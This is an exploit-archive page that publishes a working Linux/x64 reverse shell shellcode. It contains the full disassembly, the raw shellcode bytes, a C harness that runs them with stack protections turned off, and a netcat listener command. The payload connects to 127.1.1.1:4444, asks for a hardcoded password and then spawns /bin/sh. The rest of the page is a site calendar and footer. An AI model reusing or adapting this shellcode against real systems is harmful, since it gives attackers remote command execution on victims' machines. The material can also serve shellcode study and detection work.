exploit the possibilities

Linux/x64 Reverse Shell Shellcode

Linux/x64 Reverse Shell Shellcode
Posted Jan 19, 2021
Authored by Guillem Alminyana

123 bytes small Linux/x64 reverse shell shellcode that connects to TCP/127.1.1.1:4444.

tags | shell, tcp, shellcode
systems | linux
MD5 | 6fdcaaec184d84b16a741d95de7b3961

Linux/x64 Reverse Shell Shellcode

Change Mirror Download
/*
Exploit Title: Linux/x64 - Reverse Shell
Author: Guillem Alminyana
Date: 2021-01-18
Platform: GNU Linux x64
=====================================

This shellcode connects back to 127.1.1.1 address on port 4444
Listener needs to be opened before execute: nc -lvp 4444

Compile:
gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
*/

/*
0: 6a 29 push 0x29
2: 58 pop rax
3: 6a 02 push 0x2
5: 5f pop rdi
6: 6a 01 push 0x1
8: 5e pop rsi
9: 99 cdq
a: 0f 05 syscall
c: 50 push rax
d: 5f pop rdi
e: 52 push rdx
f: 68 7f 01 01 01 push 0x101017f
14: 66 68 11 5c pushw 0x5c11
18: 66 6a 02 pushw 0x2
1b: 6a 2a push 0x2a
1d: 58 pop rax
1e: 54 push rsp
1f: 5e pop rsi
20: 6a 10 push 0x10
22: 5a pop rdx
23: 0f 05 syscall
25: 6a 02 push 0x2
27: 5e pop rsi
28: 6a 21 push 0x21
2a: 58 pop rax
2b: 0f 05 syscall
2d: 48 ff ce dec rsi
30: 79 f6 jns 28 <loop_1>
32: 6a 01 push 0x1
34: 58 pop rax
35: 49 b9 50 61 73 73 77 movabs r9,0x203a647773736150
3c: 64 3a 20
3f: 41 51 push r9
41: 54 push rsp
42: 5e pop rsi
43: 6a 08 push 0x8
45: 5a pop rdx
46: 0f 05 syscall
48: 48 31 c0 xor rax,rax
4b: 48 83 c6 08 add rsi,0x8
4f: 0f 05 syscall
51: 48 b8 31 32 33 34 35 movabs rax,0x3837363534333231
58: 36 37 38
5b: 56 push rsi
5c: 5f pop rdi
5d: 48 af scas rax,QWORD PTR es:[rdi]
5f: 75 1a jne 7b <exit_program>
61: 6a 3b push 0x3b
63: 58 pop rax
64: 99 cdq
65: 52 push rdx
66: 48 bb 2f 62 69 6e 2f movabs rbx,0x68732f2f6e69622f
6d: 2f 73 68
70: 53 push rbx
71: 54 push rsp
72: 5f pop rdi
73: 52 push rdx
74: 54 push rsp
75: 5a pop rdx
76: 57 push rdi
77: 54 push rsp
78: 5e pop rsi
79: 0f 05 syscall
*/

#include <stdio.h>
#include <string.h>

unsigned char code[]= \
"\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x99\x0f\x05\x50\x5f\x52\x68\x7f\x01\x01\x01\x66\x68\x11\x5c\x66\x6a\x02\x6a\x2a\x58\x54\x5e\x6a\x10\x5a\x0f\x05\x6a\x02\x5e\x6a\x21\x58\x0f\x05\x48\xff\xce\x79\xf6\x6a\x01\x58\x49\xb9\x50\x61\x73\x73\x77\x64\x3a\x20\x41\x51\x54\x5e\x6a\x08\x5a\x0f\x05\x48\x31\xc0\x48\x83\xc6\x08\x0f\x05\x48\xb8\x31\x32\x33\x34\x35\x36\x37\x38\x56\x5f\x48\xaf\x75\x1a\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x52\x54\x5a\x57\x54\x5e\x0f\x05";

void main()
{
printf("ShellCode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

Login or Register to add favorites

File Archive:

April 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    17 Files
  • 2
    Apr 2nd
    2 Files
  • 3
    Apr 3rd
    2 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    15 Files
  • 6
    Apr 6th
    15 Files
  • 7
    Apr 7th
    20 Files
  • 8
    Apr 8th
    16 Files
  • 9
    Apr 9th
    5 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    4 Files
  • 13
    Apr 13th
    15 Files
  • 14
    Apr 14th
    27 Files
  • 15
    Apr 15th
    19 Files
  • 16
    Apr 16th
    7 Files
  • 17
    Apr 17th
    1 Files
  • 18
    Apr 18th
    1 Files
  • 19
    Apr 19th
    19 Files
  • 20
    Apr 20th
    18 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close